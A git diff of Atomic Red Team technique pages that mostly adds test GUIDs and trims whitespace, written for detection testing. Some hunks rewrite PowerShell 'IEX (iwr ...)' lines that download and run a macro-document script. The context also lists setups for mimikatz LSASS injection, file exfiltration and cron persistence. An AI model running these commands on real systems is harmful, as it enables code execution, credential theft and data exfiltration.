@@ -142,10 +154,14 @@ Scan ports to check for listening ports with python
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6ca45b04-9f15-4424-b9d3-84a217285a5c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | host_ip | Host to scan. | string | 127.0.0.1|
 | filename | Location of the project file | Path | PathToAtomicsFolder&#92;T1046&#92;src&#92;T1046.py|
@@ -165,7 +181,7 @@ python #{filename} -i #{host_ip}
 ##### Description: Check if python exists on the machine
 ##### Check Prereq Commands:
 ```powershell
-if (python --version) {exit 0} else {exit 1} 
+if (python --version) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md
index ca7319d7..7b2812cb 100644
--- a/atomics/T1047/T1047.md
+++ b/atomics/T1047/T1047.md
@@ -32,6 +32,10 @@ When the test completes , there should be local user accounts information displa
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c107778c-dcf5-47c5-af2e-1d058a3df3ea
+
+
+
 
 
 
@@ -57,6 +61,10 @@ When the test completes , there should be running processes listed on the comman
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5750aa16-0e59-4410-8b9a-8a47ca2788e2
+
+
+
 
 
 
@@ -82,6 +90,10 @@ When the test completes, there should be a list of installed patches and when th
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 718aebaa-d0e0-471a-8241-c5afa69c7414
+
+
+
 
 
 
@@ -110,10 +122,14 @@ if the provided remote host is unreacheable
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0fd48ef7-d890-4e93-a533-f7dedd5191d3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | node | Ip Address | String | 127.0.0.1|
 | service_search_string | Name Of Service | String | Spooler|
@@ -141,10 +157,14 @@ When the test completes , a new process will be started locally .A notepad appli
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | process_to_execute | Name or path of process to execute. | String | notepad.exe|
 
@@ -176,10 +196,14 @@ A common error message is "Node - (provided IP or default)  ERROR Description =T
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9c8ef159-c666-472f-9874-90c8d60d136b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | node | Ip Address | String | 127.0.0.1|
 | user_name | Username | String | DOMAIN&#92;Administrator|
@@ -218,6 +242,10 @@ You should expect to see notepad.exe running after execution of this test.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 7db7a7f9-9531-4840-9b30-46220135441c
+
+
+
 
 
 
@@ -243,10 +271,14 @@ This test tries to mask process creation by creating a new class that inherits f
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 10447c83-fc38-462a-a936-5102363b1c43
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | new_class | Derived class name | String | Win32_Atomic|
 | process_to_execute | Name or path of process to execute. | String | notepad.exe|
diff --git a/atomics/T1048.003/T1048.003.md b/atomics/T1048.003/T1048.003.md
index 7a658ca8..db4db939 100644
--- a/atomics/T1048.003/T1048.003.md
+++ b/atomics/T1048.003/T1048.003.md
@@ -27,6 +27,10 @@ Upon successful execution, sh will be used to make a directory (/tmp/victim-stag
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
+
+
+
 
 
 #### Run it with these steps! 
@@ -61,10 +65,14 @@ Upon successful execution, powershell will utilize ping (icmp) to exfiltrate not
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dd4b4421-2e25-4593-90ae-7021947ad12e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path to file to be exfiltrated. | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
 | ip_address | Destination IP address where the data should be sent. | String | 127.0.0.1|
@@ -91,6 +99,10 @@ Exfiltration of specified file over DNS protocol.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** c403b5a4-b5fc-49f2-b181-d1c80d27db45
+
+
+
 
 
 #### Run it with these steps! 
@@ -122,10 +134,14 @@ Upon successful execution, powershell will invoke web request using POST method
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6aa58451-1121-4490-a8e9-1dada3f1c68c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path to file to exfiltrate | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
 | ip_address | Destination IP address where the data should be sent | String | http://127.0.0.1|
@@ -154,10 +170,14 @@ Upon successful execution, powershell will send an email with attached file to e
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ec3a835e-adca-4c7c-88d2-853b69c11bb9
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path to file to exfiltrate | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
 | sender | The email address of the sender | String | test@corp.com|
diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md
index 6e6ecf17..53137544 100644
--- a/atomics/T1048/T1048.md
+++ b/atomics/T1048/T1048.md
@@ -25,10 +25,14 @@ Upon successful execution, sh will spawn ssh contacting a remote domain (default
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** f6786cc8-beda-4915-a4d6-ac2f193bb988
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | domain | target SSH domain | url | target.example.com|
 
@@ -58,10 +62,14 @@ Upon successful execution, tar will compress /Users/* directory and password pro
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 7c3cb337-35ae-4d06-bf03-3032ed2ec268
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | username for domain | string | atomic|
 | password | password for user | string | atomic|
diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md
index 414e5e25..edc081e0 100644
--- a/atomics/T1049/T1049.md
+++ b/atomics/T1049/T1049.md
@@ -27,6 +27,10 @@ Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net se
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0940a971-809a-48f1-9c4d-b1d785e96ee5
+
+
+
 
 
 
@@ -55,6 +59,10 @@ Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. R
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f069f0f1-baad-4831-aa2b-eddac4baac4a
+
+
+
 
 
 
@@ -81,6 +89,10 @@ Upon successful execution, sh will execute `netstat` and `who -a`. Results will
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
+
+
+
 
 
 
@@ -99,7 +111,7 @@ who -a
 ##### Description: Check if netstat command exists on the machine
 ##### Check Prereq Commands:
 ```sh
-if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; 
+if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -120,10 +132,14 @@ Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 96f974bb-a0da-4d87-a744-ff33e73367e9
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | SharpView_url | sharpview download URL | url | https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true|
 | SharpView | Path of the executable opensource redteam tool used for the performing this atomic. | path | PathToAtomicsFolder&#92;T1049&#92;bin&#92;SharpView.exe|
@@ -146,7 +162,7 @@ foreach ($syntax in $syntaxList) {
 ##### Description: Sharpview.exe must exist on disk at specified location (#{SharpView})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{SharpView}) {exit 0} else {exit 1} 
+if (Test-Path #{SharpView}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1053.001/T1053.001.md b/atomics/T1053.001/T1053.001.md
index 03205105..64bdb473 100644
--- a/atomics/T1053.001/T1053.001.md
+++ b/atomics/T1053.001/T1053.001.md
@@ -17,10 +17,14 @@ This test submits a command to be run in the future by the `at` daemon.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 7266d898-ac82-4ec0-97c7-436075d0d08e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | time_spec | Time specification of when the command should run | String | now + 1 minute|
 | at_command | The command to be run | String | echo Hello from Atomic Red Team|
@@ -40,7 +44,7 @@ echo "#{at_command}" | at #{time_spec}
 ##### Description: The `at` and `atd` executables must exist in the PATH
 ##### Check Prereq Commands:
 ```sh
-which at && which atd 
+which at && which atd
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -49,7 +53,7 @@ echo 'Please install `at` and `atd`; they were not found in the PATH (Package na
 ##### Description: The `atd` daemon must be running
 ##### Check Prereq Commands:
 ```sh
-systemctl status atd || service atd status 
+systemctl status atd || service atd status
 ```
 ##### Get Prereq Commands:
 ```sh
diff --git a/atomics/T1053.002/T1053.002.md b/atomics/T1053.002/T1053.002.md
index 63774d6d..615c84dd 100644
--- a/atomics/T1053.002/T1053.002.md
+++ b/atomics/T1053.002/T1053.002.md
@@ -22,6 +22,10 @@ Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8
+
+
+
 
 
 
diff --git a/atomics/T1053.003/T1053.003.md b/atomics/T1053.003/T1053.003.md
index 7cda336c..dd2cfbef 100644
--- a/atomics/T1053.003/T1053.003.md
+++ b/atomics/T1053.003/T1053.003.md
@@ -21,10 +21,14 @@ This test replaces the current user's crontab file with the contents of the refe
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command | Command to execute | string | /tmp/evil.sh|
 | tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil|
@@ -56,10 +60,14 @@ This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
 | cron_script_name | Name of file to store in cron folder | string | persistevil|
@@ -96,10 +104,14 @@ This test adds a script to a /var/spool/cron/crontabs folder configured to execu
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 2d943c18-e74a-44bf-936f-25ade6cccab4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
 | cron_script_name | Name of file to store in /var/spool/cron/crontabs folder | string | persistevil|
diff --git a/atomics/T1053.004/T1053.004.md b/atomics/T1053.004/T1053.004.md
index 14817e59..3692545d 100644
--- a/atomics/T1053.004/T1053.004.md
+++ b/atomics/T1053.004/T1053.004.md
@@ -17,10 +17,14 @@ This test adds persistence via a plist to execute via the macOS Event Monitor Da
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 11979f23-9b9d-482a-9935-6fc9cd022c3e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_location | evil plist location | path | $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist|
 | script_destination | Path where to move the evil plist | path | /etc/emond.d/rules/atomicredteam_T1053_004.plist|
diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md
index 82634bed..a2a34da5 100644
--- a/atomics/T1053.005/T1053.005.md
+++ b/atomics/T1053.005/T1053.005.md
@@ -30,6 +30,10 @@ the tasks, open the Task Scheduler and look in the Active Tasks pane.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** fec27f65-db86-4c2d-b66c-61945aee87c2
+
+
+
 
 
 
@@ -60,10 +64,14 @@ Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 42f53695-ad4a-4546-abb6-7d837f644a71
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | task_command | What you want to execute | String | C:&#92;windows&#92;system32&#92;cmd.exe|
 | time | What time 24 Hour | String | 72600|
@@ -96,10 +104,14 @@ Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | task_command | What you want to execute | String | C:&#92;windows&#92;system32&#92;cmd.exe|
 | time | What time 24 Hour | String | 72600|
@@ -135,6 +147,10 @@ Upon successful execution, powershell.exe will create a scheduled task to spawn
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
+
+
+
 
 
 
@@ -169,10 +185,14 @@ This module utilizes the Windows API to schedule a task for code execution (note
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ecd3fa21-7792-41a2-8726-2c5c673414d3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ms_product | Maldoc application Word | String | Word|
 
@@ -181,7 +201,8 @@ This module utilizes the Windows API to schedule a task for code execution (note
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
 Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
 ```
 
@@ -197,7 +218,7 @@ try {
   $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
   Stop-Process -Name $process
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -216,6 +237,10 @@ Create an scheduled task that executes notepad.exe after user login from XML by
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
+
+
+
 
 
 
diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml
index a7a51aef..59a7b460 100644
--- a/atomics/T1053.005/T1053.005.yaml
+++ b/atomics/T1053.005/T1053.005.yaml
@@ -127,7 +127,8 @@ atomic_tests:
       Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
       Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
     name: powershell
 - name: WMI Invoke-CimMethod Scheduled Task
diff --git a/atomics/T1053.006/T1053.006.md b/atomics/T1053.006/T1053.006.md
index 4df70d46..1c020d8c 100644
--- a/atomics/T1053.006/T1053.006.md
+++ b/atomics/T1053.006/T1053.006.md
@@ -19,10 +19,14 @@ This test creates Systemd service and timer then starts and enables the Systemd
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** f4983098-bb13-44fb-9b2c-46149961807b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | path_to_systemd_service | Path to systemd service unit file | Path | /etc/systemd/system/art-timer.service|
 | path_to_systemd_timer | Path to service timer file | Path | /etc/systemd/system/art-timer.timer|
diff --git a/atomics/T1053.007/T1053.007.md b/atomics/T1053.007/T1053.007.md
index b571a9a7..fc86bcbc 100644
--- a/atomics/T1053.007/T1053.007.md
+++ b/atomics/T1053.007/T1053.007.md
@@ -19,10 +19,14 @@ Kubernetes Job is a controller that creates one or more pods and ensures that a
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** ddfb0bc1-3c3f-47e9-a298-550ecfefacbd
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | namespace | K8s namespace to list | String | default|
 
@@ -48,10 +52,14 @@ Kubernetes Job is a controller that creates one or more pods and ensures that a
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | namespace | K8s namespace to list | String | default|
 
diff --git a/atomics/T1055.001/T1055.001.md b/atomics/T1055.001/T1055.001.md
index d0e78dc8..c014cfde 100644
--- a/atomics/T1055.001/T1055.001.md
+++ b/atomics/T1055.001/T1055.001.md
@@ -24,10 +24,14 @@ With default arguments, expect to see a MessageBox, with notepad's icon in taskb
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 74496461-11a1-4982-b439-4d87a550d254
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id|
 | dll_payload | DLL to Inject | Path | PathToAtomicsFolder&#92;T1055.001&#92;src&#92;x64&#92;T1055.001.dll|
@@ -48,7 +52,7 @@ mavinject $mypid /INJECTRUNNING #{dll_payload}
 ##### Description: Utility to inject must exist on disk at specified location (#{dll_payload})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1055.004/T1055.004.md b/atomics/T1055.004/T1055.004.md
index 9b71ca04..06a329a9 100644
--- a/atomics/T1055.004/T1055.004.md
+++ b/atomics/T1055.004/T1055.004.md
@@ -29,10 +29,14 @@ Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 tec
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 611b39b7-e243-4c81-87a4-7145a90358b1
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | exe_binary | Output Binary | Path | PathToAtomicsFolder&#92;T1055.004&#92;bin&#92;T1055.exe|
 
diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md
index b8770a1b..2df00d31 100644
--- a/atomics/T1055.012/T1055.012.md
+++ b/atomics/T1055.012/T1055.012.md
@@ -22,10 +22,14 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 562427b4-39ef-4e8c-af88-463a78e70b9c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:&#92;Windows&#92;System32&#92;cmd.exe|
 | parent_process_name | Name of the parent process | string | explorer|
@@ -60,10 +64,14 @@ This module executes notepad.exe from within the WINWORD.EXE process
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3ad4a037-1598-4136-837c-4027e4fa319b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ms_product | Maldoc application Word | String | Word|
 
@@ -72,7 +80,8 @@ This module executes notepad.exe from within the WINWORD.EXE process
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
 Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
 ```
 
@@ -88,7 +97,7 @@ try {
   $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
   Stop-Process -Name $process
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1055.012/T1055.012.yaml b/atomics/T1055.012/T1055.012.yaml
index a13bed68..742cd901 100644
--- a/atomics/T1055.012/T1055.012.yaml
+++ b/atomics/T1055.012/T1055.012.yaml
@@ -59,6 +59,7 @@ atomic_tests:
       Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
       Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
     name: powershell
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md
index c1a2510e..24905c99 100644
--- a/atomics/T1055/T1055.md
+++ b/atomics/T1055/T1055.md
@@ -25,6 +25,10 @@ is required.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1c91e740-1729-4329-b779-feba6e71d048
+
+
+
 
 
 
@@ -32,7 +36,8 @@ is required.
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
 ```
 
@@ -48,7 +53,7 @@ try {
   $path = $wdApp.Path
   Stop-Process -Name "winword"
   if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -70,10 +75,14 @@ The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3203ad24-168e-4bec-be36-f79b13ef8a83
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | machine | machine to target (via psexec) | string | DC1|
 | mimikatz_path | Mimikatz windows executable | path | %tmp%&#92;mimikatz&#92;x64&#92;mimikatz.exe|
@@ -95,11 +104,12 @@ The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-
 ##### Check Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -108,10 +118,11 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
 ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} 
+if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
 Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
 New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml
index a79b95ec..cfb0bf62 100644
--- a/atomics/T1055/T1055.yaml
+++ b/atomics/T1055/T1055.yaml
@@ -26,7 +26,8 @@ atomic_tests:
       Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
       Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
     name: powershell
 - name: Remote Process Injection in LSASS via mimikatz
@@ -60,6 +61,7 @@ atomic_tests:
       if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
     get_prereq_command: |
       $mimikatz_path = cmd /c echo #{mimikatz_path}
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
       Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -69,6 +71,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
     get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
       Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
       New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md
index ba51cd1f..76f5881a 100644
--- a/atomics/T1056.001/T1056.001.md
+++ b/atomics/T1056.001/T1056.001.md
@@ -29,10 +29,14 @@ Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and outp
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d9b633ca-8efb-45e6-b838-70f595c6ae26
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | filepath | Name of the local file, include path. | Path | $env:TEMP&#92;key.log|
 
@@ -67,6 +71,10 @@ Use 'aureport --tty' or other audit.d reading tools to read the log output, whic
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 9c6bdb34-a89f-4b90-acb1-5970614c711b
+
+
+
 
 
 
diff --git a/atomics/T1056.002/T1056.002.md b/atomics/T1056.002/T1056.002.md
index a5a12710..fa8c19e0 100644
